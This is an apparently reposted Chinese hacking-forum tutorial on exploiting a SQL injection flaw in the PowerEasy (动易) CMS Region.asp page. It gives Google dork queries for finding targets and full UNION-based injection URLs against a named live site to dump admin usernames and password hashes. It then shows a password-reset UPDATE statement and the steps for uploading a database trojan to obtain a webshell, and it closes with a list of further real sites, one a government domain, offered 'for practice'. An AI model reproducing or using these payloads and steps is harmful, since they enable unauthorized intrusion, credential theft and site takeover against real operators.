Board logo

标题: 【3AST交流】动易Region.asp注入漏洞利用 [打印本页]

作者: valen2000    时间: 2009-2-12 14:09     标题: 【3AST交流】动易Region.asp注入漏洞利用

动易Region.asp注入漏洞利用
本文章发布于06年1期的<<黑客X档案>>,转载请注名版权    by 天の翼

动易网站管理系统是当前中国最具性价比、最受欢迎的CMS系统和电子商务系统,目前已有超过10万个以上网站的应用规模,拥有政府、企业、科研教育和媒体等各个行业领域的几千名商业用户。
其中的Region.asp的Province = Trim(Request.QueryString("Province"))语句没经过过滤的,我们可以利用构造我们的SQL语句,进行注入。
总是用工具注入,水平也不会提高,而且目前还没有什么工具利用,所以我现在带领各位小黑们进行一次纯手工注入之旅,LET ‘S GO!

首先我们要找一些是动易的网站,动易的文章发布一是http://127.0.0.1/Article/ShowArticle.asp?ArticleID=1 这种形式的,现在就是GOOGLE HACKING时间。
打开GOOGLE,搜索“inurl:Article/ShowArticle.asp?ArticleID=”出现在我们大多都是使用动易的CMS系统的网站了,约有134万的查询结果,使用范围应该是很大的(巨汗ING…)


往后翻几页,我随便打开了个网站。



稍微看了下,是一个提供免费空间的站点,好,我们就从他下手了

我们先来暴用户名,在地址栏里提交
http://www.onlinegf.com/region.a ... i&Province=shit '+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1
解释一下:由于Province 过滤不严,Province =shit’后面的就是我们提交的注入语句,
+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1
这句的意思就是用UNION查询PE_Admin表(提示:动易的管理员一般是存放PE_Admin表中的,具体情况可以改其他的)在中的用户,即动易的CMS网站管理员的帐号。

如果在“市/县/区/旗”的下拉框中显示的就是他的管理员的帐号,说明网站存在漏洞了
再来暴管理员的密码,在地址栏里输入:

http://www.onlinegf.com/Region.a ... i&Province=shit '+and+1=2+union+select+password+from+PE_Admin+where+username="Jerry"+and+'1'='1

+and+1=2+union+select+password+from+PE_Admin+where+username="Jerry"+and+'1'='1的语句意思就是UNION查询PE_Admin表中Jerry的密码
我们把其中的Jerry改成刚才我们暴的管理员用户。



密码暴了出来,是用MD5加密的16位的
www.XMD5.com 查了下,运气很好,密码是纯数字的,SQL版本如果查不出密码的话,可以直接UPDATE直接改掉管理员密码,
语句Update+PE_Admin+set+Password=' 49ba59abbe56e057' where+id=1—
改掉id为1的用户,一般是admin的密码为123456,
或者直接LOG差异备份,直接得到SHELL。我在光盘的放了两篇手工注入的精华文章,有兴趣的朋友可以自己研究。



在主站最下面找到后台
http://www.onlinegf.com/Admin/Admin_login.asp

(改了的话可以GOOLE HACKING)
用得到的密码进入后台,成功了!
小黑们肯定抑制不住心中的喜悦了,别急,精彩还在后面,我们继续来拿SHELL
在后台管理 左边找到“系统设置”,选择下面的“网站频道管理”,点在右边的“下载中心”旁边的“修改”,找到“上传选项”,把“上传文件保存的目录”里改成asp.asp(名字随便,后缀要是ASP的)。保存修改结果。




我们先来做个数据库木马,我用的是旁注小助手”diy.asp”



保存的时候,文件名为”diy.rar”
再打开“下载中心”里的“添加软件”



我们在上传软件上把diy.rar传上去,记下“软件地址”里的路径,我这是”200611/20061125222047379.rar”

我们在地址拦里输入 http://www.onlinegf.com/soft/asp.asp/200611/20061125222047379.rar
哈哈,一匹小马出现拉!




上传海洋大马得到了WEBSHELL,为了提醒下管理员,只留了个页子。



为了不危害别人用免费空间,入侵就到此收工了,我可是好人啊。
(最后唠叨:其实包括很多黑客站,77169和3800hk都是用动易CMS系统的,被黑也是因为这个漏洞,相信,网络上又会血雨腥风了!
鸣谢 漏洞发现 by whytt)



PS:还是0DAY的时候就写了,现在才能放出来哦,嘿嘿
貌似还有些网站有漏洞哦
我随便找了下

http://www.bsf365.com/
http://www.cmtc.cn//
http://www.cedn.cn/
http://www.zp.gov.cn/

给大家练手,不要搞破坏哦




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2